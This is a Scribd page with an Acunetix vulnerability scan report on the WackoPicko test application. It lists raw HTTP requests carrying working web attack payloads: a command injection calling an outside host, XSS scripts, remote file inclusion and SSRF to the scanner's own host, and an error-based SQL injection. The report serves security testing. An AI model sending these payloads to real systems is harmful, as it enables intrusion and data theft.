Scribd Logo
Upload

Welcome to Scribd!

  • Quick Report: Acunetix Security Audit

    Uploaded by

    Cristian Ramirez
    84 views25 pages

    Original Title

    20200609_Quick_http_192_168_1_124_WackoPicko_.pdf

    Copyright

    © © All Rights Reserved

    Available Formats

    PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    84 views25 pages

    Quick Report: Acunetix Security Audit

    Uploaded by

    Cristian Ramirez

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    of 25

    Quick Report

    Acunetix Security Audit

    09 June 2020

    Generated by Acunetix
    Scan of 192.168.1.124
    Scan details
    Scan information
    Start time 09/06/2020, 04:08:40
    Start url http://192.168.1.124/WackoPicko/
    Host 192.168.1.124
    Scan time 4 minutes, 52 seconds
    Profile Full Scan
    Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-
    1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1
    Server information mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14
    OpenSSL/0.9.8k Phusion_Passenger/4.0.38
    mod_perl/2.0.4 Perl/v5.10.1
    Responsive True
    Server OS Unix
    Server technologies PHP,Perl,Python,Perl

    Threat level

    Acunetix Threat Level 3

    One or more high-severity type vulnerabilities have been discovered by the scanner. A malicious user can exploit these
    vulnerabilities and compromise the backend database and/or deface your website.

    Alerts distribution

    Total alerts found 81


    High 11
    Medium 54
    Low 10
    Informational 6
    Alerts
    Code execution
    Affected item /WackoPicko/passcheck.php
    Affected parameter password
    Request
    POST /WackoPicko/passcheck.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Connection: keep-alive
    Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
    Accept: */*
    Accept-Encoding: gzip,deflate
    Content-Length: 51
    Host: 192.168.1.124
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
    Gecko) Chrome/73.0.3683.103 Safari/537.36
    password=%24(nslookup%20hitcHBX8q1QN7f0d6f.bxss.me)

    Cross site scripting (verified)


    Affected item /WackoPicko/guestbook.php
    Affected parameter comment
    Request
    POST /WackoPicko/guestbook.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Referer: http://192.168.1.124/WackoPicko/
    Connection: keep-alive
    Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
    Accept: */*
    Accept-Encoding: gzip,deflate
    Content-Length: 70
    Host: 192.168.1.124
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
    Gecko) Chrome/73.0.3683.103 Safari/537.36
    comment=555'"
    ()%26%25<acx><ScRiPt%20>EVua(9983)</ScRiPt>&name=UHOdllxh

    Cross site scripting (verified)


    Affected item /WackoPicko/pictures/search.php
    Affected parameter query
    Request
    GET /WackoPicko/pictures/search.php?query=1'"
    ()%26%25<acx><ScRiPt%20>wU91(9983)</ScRiPt> HTTP/1.1
    Referer: http://192.168.1.124/WackoPicko/
    Connection: keep-alive
    Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
    Accept: */*
    Accept-Encoding: gzip,deflate
    Host: 192.168.1.124
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
    Gecko) Chrome/73.0.3683.103 Safari/537.36

    Cross site scripting (verified)


    Affected item /WackoPicko/users/login.php
    Affected parameter username
    Request
    POST /WackoPicko/users/login.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Referer: http://192.168.1.124/WackoPicko/
    Connection: keep-alive
    Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
    Accept: */*
    Accept-Encoding: gzip,deflate
    Content-Length: 88
    Host: 192.168.1.124
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
    Gecko) Chrome/73.0.3683.103 Safari/537.36
    password=g00dPa%24%24w0rD&username=UHOdllxh'"
    ()%26%25<acx><ScRiPt%20>XCbr(9711)</ScRiPt>

    File inclusion
    Affected item /WackoPicko/admin/index.php
    Affected parameter page
    Request
    POST /WackoPicko/admin/index.php?page=http://bxss.me/t/fit.txt%3F.jpg HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Referer: http://192.168.1.124/WackoPicko/
    Connection: keep-alive
    Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
    Accept: */*
    Accept-Encoding: gzip,deflate
    Content-Length: 41
    Host: 192.168.1.124
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
    Gecko) Chrome/73.0.3683.103 Safari/537.36
    adminname=g00dPa%24%24w0rD&password=login

    File inclusion
    Affected item /WackoPicko/admin/index.php
    Affected parameter page
    Request
    GET /WackoPicko/admin/index.php?page=http://bxss.me/t/fit.txt%3F.jpg HTTP/1.1
    Referer: http://192.168.1.124/WackoPicko/
    Connection: keep-alive
    Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
    Accept: */*
    Accept-Encoding: gzip,deflate
    Host: 192.168.1.124
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
    Gecko) Chrome/73.0.3683.103 Safari/537.36

    Remote file inclusion XSS


    Affected item /WackoPicko/admin/index.php
    Affected parameter page
    Request
    POST /WackoPicko/admin/index.php?page=HttP://bxss.me/t/xss.html%3F%2500 HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Connection: keep-alive
    Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
    Accept: */*
    Accept-Encoding: gzip,deflate
    Content-Length: 41
    Host: 192.168.1.124
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
    Gecko) Chrome/73.0.3683.103 Safari/537.36
    adminname=g00dPa%24%24w0rD&password=login

    Remote file inclusion XSS


    Affected item /WackoPicko/admin/index.php
    Affected parameter page
    Request
    GET /WackoPicko/admin/index.php?page=HttP://bxss.me/t/xss.html%3F%2500 HTTP/1.1
    Connection: keep-alive
    Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
    Accept: */*
    Accept-Encoding: gzip,deflate
    Host: 192.168.1.124
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
    Gecko) Chrome/73.0.3683.103 Safari/537.36

    SQL injection (verified)


    Affected item /WackoPicko/users/login.php
    Affected parameter username
    Request
    POST /WackoPicko/users/login.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Connection: keep-alive
    Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
    Accept: */*
    Accept-Encoding: gzip,deflate
    Content-Length: 355
    Host: 192.168.1.124
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
    Gecko) Chrome/73.0.3683.103 Safari/537.36
    password=g00dPa%24%24w0rD&username='and(select%201%20from(select%20count(*)%2Cco
    ncat((select%20concat(CHAR(52)%2CCHAR(67)%2CCHAR(117)%2CCHAR(81)%2CCHAR(57)%2CCHAR(67)%2C
    CHAR(121)%2CCHAR(52)%2CCHAR(79)%2CCHAR(50)%2CCHAR(69))%20from%20information_schema.tables
    %20limit%200%2C1)%2Cfloor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20
    x)a)and'

    Server side request forgery


    Affected item /WackoPicko/admin/index.php
    Affected parameter page
    Request
    POST /WackoPicko/admin/index.php?page=http://hitm1YRhASIND.bxss.me/ HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Connection: keep-alive
    Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
    Accept: */*
    Accept-Encoding: gzip,deflate
    Content-Length: 41
    Host: 192.168.1.124
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
    Gecko) Chrome/73.0.3683.103 Safari/537.36
    adminname=g00dPa%24%24w0rD&password=login

    Server side request forgery


    Affected item /WackoPicko/admin/index.php
    Affected parameter page
    Request
    GET /WackoPicko/admin/index.php?page=http://hitYWkgofMX4F.bxss.me/ HTTP/1.1
    Connection: keep-alive
    Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
    Accept: */*
    Accept-Encoding: gzip,deflate
    Host: 192.168.1.124
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
    Gecko) Chrome/73.0.3683.103 Safari/537.36

    Apache httpOnly cookie disclosure


    Affected item Web Server
    Affected parameter
    Request
    GET / HTTP/1.1
    Cookie:
    acunetixCookie=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    Connection: keep-alive
    Accept: */*
    Accept-Encoding: gzip,deflate
    Host: 192.168.1.124
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
    Gecko) Chrome/73.0.3683.103 Safari/537.36

    Apache httpd remote denial of service


    Affected item Web Server
    Affected parameter
    Request

    Application error message


    Affected item /WackoPicko/users/login.php
    Affected parameter username
    Request
    POST /WackoPicko/users/login.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Referer: http://192.168.1.124/WackoPicko/
